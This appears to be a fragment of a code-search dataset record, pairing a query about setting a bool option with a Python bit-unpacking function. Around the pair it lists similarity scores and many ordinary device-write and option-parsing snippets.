"def __write_command(serial_port, command):\n line_ending = \"\\r\\n\"\n ctrl_c_cmd = \"\\x03\" + line_ending\n\n # Clear any existing text by sending a CTRL-C\n # command and waiting for a prompt\n serial_port.write(ctrl_c_cmd.encode(\"utf-8\"))\n Cambrionix.__get_response(serial_port)\n\n if not command.endswith(line_ending):\n command += line_ending\n\n for char in command:\n serial_port.write(char.encode(\"utf-8\"))\n if command.startswith(\"reboot\") and char == \"\\r\":\n break\n\n while True:\n ready = select.select([serial_port], [], [], 25)[0]\n if ready:\n if serial_port.read(1).decode(\"utf-8\") == char:\n break\n else:\n raise errors.DeviceError(\"Device cambrionix write command failed. \"\n \"Read timeout on serial port: {} \"\n \"while writing command: {}\".format(\n serial_port, command))",
"def write(self, endpoint, data):\n return self.device.write(endpoint, data)",
"def send_to_port(self):\r\n time.sleep(2)\r\n # ser.write(\"R\".encode())\r\n ser.flush()\r\n ser.write(\"{},{},{},{},{}\".format(self.x_Pos, self.y_Pos, self.t_Tap, self.U_on, self.u_off).encode())\r\n # ser.flush()\r\n # while (1 == 1):\r\n # mydata = ser.readline().lstrip()\r\n # print(mydata.decode('utf-8'))\r\n # value = str(mydata)\r",
"def write(self,command,ser = None):\n if ser is None:\n ser = self.ser\n if ser is not None:\n self.flush(ser = ser)\n ser.write(command)\n debug(\"%s: Sent %r\" % (ser.name,command))",
"def _write_i2c(fd, buf):\n w = os.write(fd, buf)\n if len(buf) != w:\n raise OSError(errno.EIO, os.strerror(errno.EIO))",
"def write(self, filename, data, hdr):\n pass",
"def send(self, data):\n \n try:\n self.s.send(data)\n LED.blink(2, 0.1, 0x00ff00)\n print(\"Sending data:\")\n print(data)\n except OSError as e:\n if e.errno == 11:\n print(\"Caught exception while sending\")\n print(\"errno: \", e.errno)\n \n LED.off()\n data = self.s.recv(64)\n print(\"Received data:\", data)\n\n return data",
"def write_data(self, data):\n print \"Writing data...\"\n # Write data into log\n self.log.write_file(data)\n\n # Close log so information can be sent\n self.log.close_log()",
"def write_firmware(self, data):\n self.check_validity()\n\n data = list(map(int, data))\n\n return self.ipcon.send_request(self, BrickletIndustrialDualAnalogInV2.FUNCTION_WRITE_FIRMWARE, (data,), '64B', 9, 'B')",
"def __transfer(self, data: int):\n self.__spi.writebytes(data)",
"def write(self, filename, data):\n owner_rw = 0600\n fd = os.open(filename, os.O_WRONLY | os.O_CREAT, owner_rw)\n # In case file existed already with wrong permissions, fix them.\n os.chmod(filename, owner_rw)\n os.write(fd, data)\n os.close(fd)",
"def _write(self, data, length, error, move_start=True):\n idxs = self.get_indexes(self._end, length, self.maxsize)\n self.move_end(length, error, move_start)\n self._data[idxs] = data",
"def connect(self):\n # open serial port\n try:\n #device = self.get_device_name(self.serial_number)\n device = \"/dev/ttyAMA0\"\n self.serial.port = device\n # Set RTS line to low logic level\n self.serial.rts = False\n self.serial.open()\n except Exception as ex:\n self.handle_serial_error(ex)",
"def write(self, value):\n if self.mode is UNAVAILABLE:\n raise IOError, \"%s can not be used through Firmata\" % self\n if self.mode is INPUT:\n raise IOError, \"%s is set up as an INPUT and can therefore not be written to\" % self\n if value is not self.value:\n self.value = value\n if self.mode is OUTPUT:\n if self.port:\n self.port.write()\n else:\n msg = chr(DIGITAL_MESSAGE)\n msg += chr(self.pin_number)\n msg += chr(value)\n self.board.sp.write(msg)\n elif self.mode is PWM:\n value = int(round(value * 255))\n msg = chr(ANALOG_MESSAGE + self.pin_number)\n# print(value)\n msg += chr(value % 128)\n msg += chr(value >> 7)\n self.board.sp.write(msg)\n elif self.mode is SERVO:\n value = int(value)\n msg = chr(ANALOG_MESSAGE + self.pin_number)\n msg += chr(value % 128)\n msg += chr(value >> 7)\n self.board.sp.write(msg)",
"def send_data(self, data: int):\n self.write_pin(self.DC_PIN, RPi.GPIO.HIGH)\n self.__transfer([data])",
"def write_firmware(self, data):\n data = list(map(int, data))\n\n return self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_WRITE_FIRMWARE, (data,), '64B', 'B')",
"def i2c_write(self, addrs, data):\n buf = [0x00, 0x90]\n self._i2c_write(addrs, data, buf)",
"def _write(self, s):\n self.fh.write(s)\n self.fh.flush()",
"def write_data(self, data, response_required=None, timeout=5.0, raw=False):\n if self._transport is None:\n return\n\n if self._paused:\n return\n\n if self._waiting_for_response:\n LOG.debug(\"queueing write %s\", data)\n self._queued_writes.append((data, response_required, timeout))\n return\n\n if response_required:\n self._waiting_for_response = response_required\n if timeout > 0:\n self._timeout_task = self.loop.call_later(\n timeout, self._response_required_timeout\n )\n\n if not raw:\n cksum = 256 - reduce(lambda x, y: x + y, map(ord, data)) % 256\n data = data + \"{:02X}\".format(cksum)\n if int(data[0:2], 16) != len(data) - 2:\n LOG.debug(\"message length wrong: %s\", data)\n\n LOG.debug(\"write_data '%s'\", data)\n self._transport.write((data + \"\\r\\n\").encode())",
"def write(self, data: str):\n self.out_file.write(f\"{data}\\n\")",
"def writedata(self,filename_): # 3\n res = self.__obj.writedata(filename_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)",
"def _write_at(self, data, offset):\n n_data = len(data)\n bytes_written = 0\n while bytes_written < n_data:\n available = min(\n n_data - bytes_written,\n self.channel.connection.credits * smb2.BYTES_PER_CREDIT,\n self.channel.connection.negotiate_response.max_write_size,\n )\n chunk = data[bytes_written : bytes_written + available]\n count = self.channel.write(self, offset + bytes_written, chunk)\n bytes_written += count\n if bytes_written:\n self._offset += bytes_written\n # update the EOF marker if we write past it\n self._end_of_file = max(self.end_of_file, self._offset)\n return bytes_written",
"def write_cmd(self, address, data, d_width=4, d_length=1, timeout=10):\n # Write the address and data\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_ADDR_OFFSET,\n address)\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_DATA_OFFSET,\n data)\n\n # Build the write command\n cmd_word = get_cmd_word(WRITE_CMD, d_width, d_length)\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET,\n cmd_word)\n\n # Wait for ACK in steps of 1ms\n countdown = timeout\n while not self.is_cmd_mailbox_idle() and countdown > 0:\n time.sleep(0.001)\n countdown -= 1\n\n # If ACK is not received, alert users.\n if countdown == 0:\n raise RuntimeError(\"ArduinoDevMode write_cmd() not acknowledged.\")",
"def write(self, data):\n line = pkt_line(data)\n line_len = len(line)\n over = self._buflen + line_len - self._bufsize\n if over >= 0:\n start = line_len - over\n self._wbuf.write(line[:start])\n self.flush()\n else:\n start = 0\n saved = line[start:]\n self._wbuf.write(saved)\n self._buflen += len(saved)"
] | [
"0.8171523",
"0.8080821",
"0.742356",
"0.72597915",
"0.7125678",
"0.69886917",
"0.69797105",
"0.6972711",
"0.6927657",
"0.6772062",
"0.6589696",
"0.6576141",
"0.64458084",
"0.6434454",
"0.635318",
"0.6322469",
"0.631071",
"0.6309109",
"0.62654054",
"0.6261372",
"0.6193785",
"0.61737937",
"0.6171418",
"0.6134486",
"0.6133845",
"0.61274725",
"0.6096332",
"0.6047607",
"0.6045882",
"0.6017959",
"0.59743047",
"0.59608537",
"0.5958651",
"0.5946047",
"0.5941867",
"0.59393984",
"0.59254056",
"0.5903805",
"0.5901545",
"0.5894963",
"0.58890563",
"0.58841354",
"0.58736384",
"0.5845307",
"0.57773",
"0.5755511",
"0.574005",
"0.57337034",
"0.5715802",
"0.57127273",
"0.570951",
"0.5700808",
"0.5690709",
"0.5680718",
"0.56617117",
"0.5641741",
"0.56403786",
"0.5638689",
"0.5637695",
"0.562396",
"0.562207",
"0.5621177",
"0.56131965",
"0.5608423",
"0.5596521",
"0.5590329",
"0.55900544",
"0.5589672",
"0.5588943",
"0.55886406",
"0.55817634",
"0.557666",
"0.5566234",
"0.556035",
"0.5550353",
"0.5546896",
"0.55386573",
"0.5532684",
"0.55310935",
"0.5527217",
"0.55203515",
"0.5518867",
"0.5518189",
"0.5504835",
"0.54965854",
"0.54940706",
"0.54771215",
"0.54638344",
"0.54612243",
"0.5460613",
"0.5459908",
"0.54598963",
"0.5456954",
"0.5453191",
"0.5451075",
"0.5451072",
"0.5438785",
"0.5437804",
"0.5434273",
"0.5433909"
] | 0.75385743 | 2 |
Set a bool option. | def get_bools_array(self, bools, limit):
    bit_array = bytearray()
    bits_array_length = (limit) // 8
    for x in range(bits_array_length):
        bit_array.append(0)
    for x in range(limit):
        # set the bits
        if bools[x]['value'] == True:
            index = x // 8
            bit = x % 8
            bit_array[index] |= 1 << bit
    return bit_array
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setBooleanOption(self, option, value):\n result = self.__lib.voikkoSetBooleanOption(self.__handle, option, _boolToInt(value))\n if result == 0:\n raise VoikkoException(\"Could not set boolean option %s to value %s\" % (option, value))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionOption_setBoolValue(self, *args)",
"def setbool(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetBool(self.AT_H, command, value)",
"def bool_option (arg: Any) -> bool:\n return True",
"def _set_bool(name, value, context):\n if name in os.environ:\n envval = os.environ.get(name).lower()\n if envval in [\"1\", \"true\", \"y\", \"yes\"]:\n context[name] = True\n elif envval in [\"0\", \"false\", \"n\", \"no\"]:\n context[name] = False\n else:\n raise ValueError(f\"{name} is a boolean, cannot match '{os.environ[name]}'\")\n\n _set_default(name, value, context)",
"def getboolean(self, option):\n return getboolean(self.name, option)",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def boolean_option_action(option,opt_str,value,parser):\n #print \"Processing %s\" % (opt_str)\n setattr(parser.values,option.dest,True)",
"def get_bool(self, option, argument=None):\n return bool(self.get(option, argument))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionProperties_setBoolValue(self, *args)",
"def set_bool_attribute(self, id: str, b: Optional[bool]):\n self.set_attribute(id, None if not b else ConstInt(1))",
"def getboolean(self, option, default=None):\n\t\treturn self._get_raw(option, 'boolean', default)",
"def getboolean(self, section, option):\n value = self.get(section, option)\n if str(value).lower() in ('1', 'yes', 'true', \"on\"):\n return True\n if str(value).lower() in ('0', 'no', 'false', 'off'):\n return False\n raise ValueError('cannot use it as a boolean value')",
"def set(self, boolean):\n self._val = boolean",
"def option_bool(argument: Optional[str]) -> bool:\n if argument and argument.strip():\n output = tinydocutils.directives.choice(argument, (\"true\", \"false\"))\n return output == \"true\"\n return True",
"def get_bool(options, name, default=False):\n value = options.get(name)\n if not value:\n return default\n if value.lower() == 'true':\n return True\n elif value.lower() == 'false':\n return False\n else:\n raise zc.buildout.UserError(\n \"Invalid value for %s option: %s\" % (name, value))",
"def setBoolean(self, key, value):\n self.__config.setValue(key, QtCore.QVariant(value))\n self.__saved = False",
"def bool_flag(s):\n if s.lower() in ['off', 'false', '0']:\n return False\n if s.lower() in ['on', 'true', '1']:\n return True\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag (0 or 1)\")",
"def getbool(option, default = None):\n\treturn _cfg.getboolean('rosshm', option, fallback = default)",
"def cmakeBoolOptionIsSet(self, opt):\n\n if self.envcmake.has_key( opt ):\n\n val = str(self.envcmake.get(opt,\"\"))\n\n if val == \"1\" or val == \"ON\" or val == \"YES\":\n\n return True\n\n return False",
"def getbool(self, section, option, default=None):\r\n return self.get(section, option, type=bool, default=default)",
"def set_parameter(self, name, value = None):\n set_option = False\n for parameter in self.parameters:\n if name in parameter.names:\n if isinstance(parameter, _Switch):\n if value is None:\n import warnings\n warnings.warn(\"For a switch type argument like %s, \"\n \"we expect a boolean. None is treated \"\n \"as FALSE!\" % parameter.names[-1])\n parameter.is_set = bool(value)\n set_option = True\n else:\n if value is not None:\n self._check_value(value, name, parameter.checker_function)\n parameter.value = value\n parameter.is_set = True\n set_option = True\n if not set_option:\n raise ValueError(\"Option name %s was not found.\" % name)",
"def __call__(self, parser, namespace, value, unused_option_string=None):\n try:\n setattr(namespace, self.dest, util.parse_bool(value))\n except TypeError as err:\n raise argparse.ArgumentError(self, 'Boolean value required') from err",
"def getboolean(self, option, default = None, section = None):\n v = self.get(option, default, section)\n if isinstance(v, str):\n v = v.lower()\n if v not in self.cfg._boolean_states:\n raise ValueError, \"Not a boolean: %s\" % v\n v = self.cfg._boolean_states[v]\n return v",
"def setBit(self,i,boolval):\n self.boolVals[i]=boolval",
"async def _opt_set(self, ctx, option, value):\n try:\n guild_options = self.database.get_guild_options(ctx.guild.id)\n cur_val = getattr(guild_options, option)\n if isinstance(cur_val, (int, bool)):\n if value.upper() == \"ALLOW\" or value.upper() == \"TRUE\":\n value = True\n elif value.upper() == \"FORBID\" or value.upper() == \"FALSE\":\n value = False\n else:\n await ctx.send(\"Sorry, that option only accepts true or false values.\")\n return\n if isinstance(cur_val, str):\n value = utils.replace_escapes(value)\n setattr(guild_options, option, value)\n self.database.save_item(guild_options)\n await ctx.send(f\"Option {option} set to `{value}`\")\n except AttributeError:\n await ctx.send(\"I don't recognize that option.\")",
"def set_gateway(self, bool_value):\n self.chkbtn_gateway.set(bool_value)",
"def option_default_true(arg: Any) -> bool:\n\n if isinstance(arg, bool):\n return arg\n\n if arg is None:\n return True\n\n sanitized = arg.strip().lower()\n\n if sanitized == \"true\":\n return True\n elif sanitized == \"false\":\n return False\n else:\n raise ValueError(f\"Directive option argument '{arg}' is not valid. \"\n f\"Valid arguments are 'true' or 'false'.\")",
"def test_set_type_bool(self):\n result = self.runner.invoke(\n cli,\n [\n *CLI_LOG_OPTION,\n \"config\",\n \"set\",\n \"agent.logging_config.disable_existing_loggers\",\n \"true\",\n \"--type=bool\",\n ],\n standalone_mode=False,\n catch_exceptions=False,\n )\n assert result.exit_code == 0",
"def set_boolean(x):\n\n if x:\n return \"True\"\n else:\n return \"False\"",
"def bool_flag(s):\n FALSY_STRINGS = {\"off\", \"false\", \"0\"}\n TRUTHY_STRINGS = {\"on\", \"true\", \"1\"}\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def init_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"init_flag must be bool.\")\n self.set_init_flag(value)\n self._init_flag = value",
"def register_bool(self, name, short=None, default=None, group=None, help=None):\n self._register(name, self._parse_bool, short=short, default=default,\n group=group, help=help)",
"def _setForBinding (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forBinding = value\n return value",
"def _setBoolFeature(self, valueToSet):\n\n errorCode = VimbaDLL.featureBoolSet(self._handle,\n self._name,\n valueToSet)\n if errorCode != 0:\n raise VimbaException(errorCode)",
"def opt_option(self, option):\n if \"=\" in option:\n path, value = option.split(\"=\")\n self.setOverride(\n DEFAULT_CONFIG,\n path.split(\"/\"),\n value,\n self.overrides\n )\n else:\n self.opt_option(\"{}=True\".format(option))",
"def setOption(self, pluginOptionDict):\n return True",
"def set_opts(self, opts):\n opts = dict(opts)\n for k, v in opts.iteritems():\n try:\n # Fix for lofar parameter set integration:\n # If the attribute is a bool, test if it is a string.\n # and then try to parse it\n if hasattr(self, k):\n if isinstance(self.__getattribute__(k), bool):\n if isinstance(v, bool) or v == None:\n # just enter the bool into the parameter\n pass\n elif isinstance(v, basestring):\n # Try parse it as a parameter set bool string\n v = self._parse_string_as_bool(v)\n else:\n # raise error\n raise tcError(\"unknown type for bool variable\")\n if k == 'sb':\n # quick check on the sb sintax\n import re\n def sb_re(strg):\n return bool(re.match(\"^[0-9,.]*$\", strg))\n if not sb_re(v): raise RuntimeError('Parameter \"{0}\" is not defined properly.'.format(k))\n\n if v == \"none\":\n v = None\n self.__setattr__(k, v)\n except tcError, e:\n # Catch and re-raise as a RuntimeError\n raise RuntimeError('Parameter \"{0}\" is not defined properly.\\\n \\n {1}'.format(k, str(e)))",
"def opt_option(self, option):\n\n if \"=\" in option:\n path, value = option.split('=')\n self._setOverride(\n DEFAULT_CONFIG,\n path.split('/'),\n value,\n self.overrides\n )\n else:\n self.opt_option('%s=True' % (option,))",
"def is_bool(self):\n validator = self.__class__.get_setting_validator(self.key, **self.get_kwargs())\n\n return self.__class__.validator_is_bool(validator)",
"def getBoolean(self, section, option, default=False):\n return self.get(section, option, default, _bool)",
"def set_bool_value(self, event):\n\n self.undo_add()\n\n key_list = list(self.patch.engine.misc_data.keys())\n key = key_list[self.selected_index]\n data = self.patch.engine.misc_data[key]\n\n if self.ValueEnabled.GetValue():\n self.patch.misc[key] = data['on']\n else:\n self.patch.misc[key] = data['off']\n\n self.is_modified(True)\n self.misclist_update_row(self.selected_index)",
"def device_set_property_bool(pnd, property, bEnable):\n return _nfc.device_set_property_bool(pnd, property, bEnable)",
"def CONST_BOOL(self, t):\n t.value = False if t.value == '#false' else True\n return t",
"def config_get_bool(section, option):\n return __CONFIG.getboolean(section, option)",
"def get_bool(section, option, default=False):\n\tres = get(section, option, default)\n\n\tif res == default:\n\t\treturn default\n\n\tif res.lower() == \"true\" or res == \"1\":\n\t\treturn True\n\n\treturn default",
"def get_bool(self, sect, opt):\r\n return self.get_safe(sect, opt) == \"True\"",
"def _writeBool(self, val):\n self.__writeValue(self.boolFormat, val)",
"def argparse_bool(x):\n return str(x).lower() in {'true', '1', 'yes'}",
"def boolean_flag(parser, name, default=False, help=None):\n dest = name.replace('-', '_')\n parser.add_argument(\"--\" + name, action=\"store_true\", default=default, dest=dest, help=help)\n parser.add_argument(\"--no-\" + name, action=\"store_false\", dest=dest)",
"def parse_bool(section, optionname):\n string = section.dict[optionname]\n if string.lower() == \"true\" or string.lower() == \"yes\":\n return True\n elif string.lower() == \"false\" or string.lower() == \"no\":\n return False\n elif string.isdigit():\n return bool(int(string))\n else:\n raise ValueError(\"Option \" + optionname + \" in section \" + section.name\n + \" is not a valid boolean!\")",
"def getBooleanOption(aConfig, aSection, aOption):\n if aConfig.has_option(aSection, aOption):\n return aConfig.getboolean(aSection, aOption)\n else:\n # Default value. This should match the initialization done in\n # __init__ of class task in taskHandler.py\n if (aOption == \"fullScreenMode\" or\n aOption == \"formatOutput\" or\n aOption == \"compressOutput\"):\n return True\n else:\n # \"useWebDriver\"\n # \"runSlowTests\"\n # \"runSkipTests\"\n # \"useGrid\"\n return False",
"def bool_attr(attr):\n if attr.lower() == \"true\":\n val = True\n elif attr.lower() == \"false\":\n val = False\n else:\n raise EzXMLError(\"Must be \"\\\n \"'true' or 'false'. Not %s\" % (attr))\n return val",
"def _setForDocument (self, value):\n if not isinstance(value, bool):\n raise TypeError(value)\n self.__forDocument = value\n return value",
"def explicit_bool(value: bool) -> bool:\n return value",
"def _boolean_callback(self, *args):\n\t\tnew_value = args[1].get_boolean()\n\n\t\targs[0].set_state(GLib.Variant.new_boolean(new_value))\n\t\tself.window.set_picture_title()\n\t\tself.get_active_pane().hide_options_menu()",
"def bool_config_override(key):\n if os.environ.get(key):\n try:\n truth_value = strtobool(os.environ[key])\n if truth_value == 1:\n config_opts[key] = True\n else:\n config_opts[key] = False\n except ValueError:\n values = [\"y\", \"yes\", \"t\", \"true\", \"on\", 1, \"n\", \"f\", \"false\", \"off\", 0]\n raise BuildTestError(f\"Must be one of the following {values}\")",
"def force_bool(value):\n if isinstance(value, (bool, int)):\n return bool(value)\n\n boolean_states = ConfigParser._boolean_states\n if not value.lower() in boolean_states:\n return None\n\n return boolean_states[value.lower()]",
"def bool_to_on_off(boolean: bool):\n if boolean:\n return \"on\"\n return \"off\"",
"def writeAttributeBool(self, *args):\n return _libsbml.XMLOutputStream_writeAttributeBool(self, *args)",
"def add_boolean(self, name, **kwargs):\n self.add(Flags.BooleanFlag(name, **kwargs))",
"def getBoolValue(self):\n return _libsbml.ConversionOption_getBoolValue(self)",
"def getSetBoolean(self, key: str, default: bool | None = None) -> bool:\n value = self.parsedConfig.getboolean(key, default)\n self.parsedConfig[key] = str(value)\n return value",
"def virtual_flag(self, value):\n if not isinstance(value, bool):\n raise TypeError(\"virtual_flag must be bool.\")\n self._virtual_flag = value",
"def Bool(arg):\n return arg.lower() in ('y', 'true', 't', '1')",
"def str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def test_set_boolean(self):\n setting_name = 'project_bool_setting'\n url = reverse(\n 'projectroles:api_project_setting_set',\n kwargs={'project': self.project.sodar_uuid},\n )\n post_data = {\n 'app_name': EX_APP_NAME,\n 'setting_name': setting_name,\n 'value': True,\n }\n response = self.request_knox(url, method='POST', data=post_data)\n self.assertEqual(response.status_code, 200, msg=response.content)\n obj = AppSetting.objects.get(name=setting_name, project=self.project)\n self.assertEqual(obj.get_value(), True)",
"def boolean(self, boolean):\n\n self._boolean = boolean",
"def bool_on_off(value):\n return 'on' if value else 'off'",
"def set_signal_active(self, bool_value):\n self.chkbtn_signal_active.set(bool_value)",
"def set_simple(value):\r\n LogOptions._SIMPLE = bool(value)",
"def restricted_bool(x):\n try:\n x = bool(x)\n except ValueError:\n raise argparse.ArgumentTypeError(\"%r not a bool literal\" % (x,))\n return x",
"def get_bool(self, name, default=False):\n return self.get_as(self.parse_bool, name, default, value_type=bool)",
"def set_flag(self, set_flag):\n\n self._set_flag = set_flag",
"def read_boolean_option(config, section, option):\n if not config.has_section(section):\n return\n\n return config.has_option(section, option)",
"def boolean(self, label, component, config, name, default=False):\n\n default = self.setting(config, name, default)\n return st.checkbox(label, value=default, key=component + name)",
"def writeBoolean(self, value: bool):\n self.writeByte(1 if value else 0)",
"def bool_flag(s):\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")",
"def set_option(name, option):\n ffi.lib.LLVMPY_SetCommandLine(_encode_string(name),\n _encode_string(option))",
"def str2bool(v) -> bool:\n\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(bool_arg):\n if bool_arg.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif bool_arg.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise ValueError(f'Boolean argument expected. Got {bool_arg} instead.')",
"def setOption(self, name, value):\n petsc.optionsSetValue(name, value)\n return",
"def SetFlag(self, flag, option_state):\r\n \r\n state = self.state\r\n \r\n if option_state:\r\n state |= flag\r\n else:\r\n state &= ~flag\r\n\r\n self.state = state\r\n\r\n if flag in [self.buttonClose, self.buttonMaximize, self.buttonMinimize, self.buttonPin]:\r\n self.ResetButtons()\r\n \r\n return self",
"def flag_set(self, flag):\n if self.flags & flag != 0:\n return True\n else:\n return False",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def test_get_value_bool(self):\n val = self.setting_bool.get_value()\n self.assertIsInstance(val, bool)\n self.assertEqual(val, True)",
"def get_attr_bool(self, name, default=False):\n v = self.get_attr(name)\n if v is None:\n return default\n if v.lower() in [\"t\", \"true\", \"y\", \"yes\", \"1\"]:\n return True\n else:\n return False",
"def _prep_bool_arg(arg):\n return bool(strtobool(str(arg)))",
"def get_bool(self, key, default):\n value = self.get(key, default)\n if isinstance(value, bool):\n return value\n return value.lower() in (\"true\", \"t\", \"yes\", \"y\")",
"def val(self, new_val: bool) -> None:\n if type(new_val) != bool:\n raise TypeError(f\"Invalid literal {new_val} with type '{new_val.__class__.__name__}' for parameter 'new_val'\")\n self._val: bool = new_val\n return",
"def set_value(self, item, value):\n super(t_8_Bit_Options, self).set_value(item, value)\n\n if(item == t_8_Bit_Options.BOOLEAN_CONFIG_1):\n self.set_bools(value, self.bools, t_8_Bit_Options.BIT_MAX)",
"def bool_value(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"bool_value\")",
"def on_off_bool(value):\n return value == 'on'",
"def test_getboolean_with_default(self):\n self.assertEqual(self.config.getboolean('advanced','p'),None)\n self.assertEqual(self.config.getboolean('advanced','p',True),True)",
"def set_option(k, v=\"True\"):\n if k == \"log\":\n OPTIONS_TABLE[k] = getattr(logging, v.upper(), None)\n elif k == \"backend\":\n OPTIONS_TABLE[k] = sdm_backends.Backends.get_backend_name(v)\n elif k == \"config\":\n OPTIONS_TABLE[k] = sdm_util.get_abs_path(v)",
"def set_option(self, dest, value, force=True):\r\n if hasattr(self._option_values, dest) and not force:\r\n return\r\n setattr(self._option_values, dest, value)",
"def str2bool(v):\n if v.lower() == 'true':\n return True\n elif v.lower() == 'false':\n return False\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def parse_bool(arg):\n if arg == 'True':\n return True\n elif arg == 'False':\n return False\n else:\n raise argparse.ArgumentTypeError(\"Expected 'True' or 'False'.\")",
"def is_bool(self):\n answer = self._call('is_bool')\n return answer.yes",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')",
"def str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')"
] | [
"0.81047094",
"0.7505482",
"0.72757864",
"0.72743803",
"0.70943683",
"0.705241",
"0.70266336",
"0.70084757",
"0.6970434",
"0.6921304",
"0.6904598",
"0.68884057",
"0.6847308",
"0.6807809",
"0.67250526",
"0.6707975",
"0.6671484",
"0.664038",
"0.66249967",
"0.6597783",
"0.651423",
"0.65032226",
"0.6467936",
"0.64536244",
"0.64346325",
"0.6423603",
"0.6385956",
"0.63799703",
"0.636212",
"0.6358862",
"0.63382375",
"0.6336264",
"0.63281167",
"0.63273937",
"0.6322064",
"0.6310586",
"0.62914115",
"0.6268994",
"0.62598103",
"0.62272274",
"0.6226767",
"0.62248677",
"0.62077576",
"0.6181871",
"0.6151472",
"0.6138179",
"0.61309224",
"0.61262757",
"0.6112616",
"0.61059684",
"0.60956436",
"0.60815",
"0.6065185",
"0.6057164",
"0.60273063",
"0.6021811",
"0.60124916",
"0.60037017",
"0.5995529",
"0.59951234",
"0.593159",
"0.59293365",
"0.5928432",
"0.5922593",
"0.59152263",
"0.58977544",
"0.5894333",
"0.5887994",
"0.5887036",
"0.5880179",
"0.5872852",
"0.5868595",
"0.58626956",
"0.58602226",
"0.585622",
"0.585152",
"0.5847893",
"0.58343893",
"0.5832523",
"0.580831",
"0.5808267",
"0.5806948",
"0.57901365",
"0.5779698",
"0.57780004",
"0.57780004",
"0.5768884",
"0.57676816",
"0.5766831",
"0.57611686",
"0.5751903",
"0.57467055",
"0.57390195",
"0.5735766",
"0.5732144",
"0.5725484",
"0.5723149",
"0.5706481",
"0.56815565",
"0.567936",
"0.567936"
] | 0.0 | -1 |
Set a bool option. | def set_bools(self, value, bools, limit):
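    # Unpack the low `limit` bits of `value` into the matching entries of `bools`:
    # bit x of `value` set -> bools[x]['value'] = True, otherwise False
    # (e.g. value=0b0101 with limit=4 leaves entries 0 and 2 True, entries 1 and 3 False).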
for x in range(limit):
if value & 1 << x:
bools[x]['value'] = True
else:
bools[x]['value'] = False
pass | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setBooleanOption(self, option, value):\n result = self.__lib.voikkoSetBooleanOption(self.__handle, option, _boolToInt(value))\n if result == 0:\n raise VoikkoException(\"Could not set boolean option %s to value %s\" % (option, value))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionOption_setBoolValue(self, *args)",
"def setbool(self, strcommand, value):\n command = ct.c_wchar_p(strcommand)\n value = ct.c_bool(value)\n self.lib.AT_SetBool(self.AT_H, command, value)",
"def bool_option (arg: Any) -> bool:\n return True",
"def _set_bool(name, value, context):\n if name in os.environ:\n envval = os.environ.get(name).lower()\n if envval in [\"1\", \"true\", \"y\", \"yes\"]:\n context[name] = True\n elif envval in [\"0\", \"false\", \"n\", \"no\"]:\n context[name] = False\n else:\n raise ValueError(f\"{name} is a boolean, cannot match '{os.environ[name]}'\")\n\n _set_default(name, value, context)",
"def getboolean(self, option):\n return getboolean(self.name, option)",
"def set(self, attr, value=True):\n if type(value) == bool:\n self.__dict__['_'+attr] = value\n print attr, \"set to\", value\n else:\n print 'Value must be a bool, either \"True\" or \"False\" (no quotes)!'",
"def boolean_option_action(option,opt_str,value,parser):\n #print \"Processing %s\" % (opt_str)\n setattr(parser.values,option.dest,True)",
"def get_bool(self, option, argument=None):\n return bool(self.get(option, argument))",
"def setBoolValue(self, *args):\n return _libsbml.ConversionProperties_setBoolValue(self, *args)",
"def set_bool_attribute(self, id: str, b: Optional[bool]):\n self.set_attribute(id, None if not b else ConstInt(1))",
"def getboolean(self, option, default=None):\n\t\treturn self._get_raw(option, 'boolean', default)",
"def getboolean(self, section, option):\n value = self.get(section, option)\n if str(value).lower() in ('1', 'yes', 'true', \"on\"):\n return True\n if str(value).lower() in ('0', 'no', 'false', 'off'):\n return False\n raise ValueError('cannot use it as a boolean value')",
"def set(self, boolean):\n self._val = boolean",
"def option_bool(argument: Optional[str]) -> bool:\n if argument and argument.strip():\n output = tinydocutils.directives.choice(argument, (\"true\", \"false\"))\n return output == \"true\"\n return True",
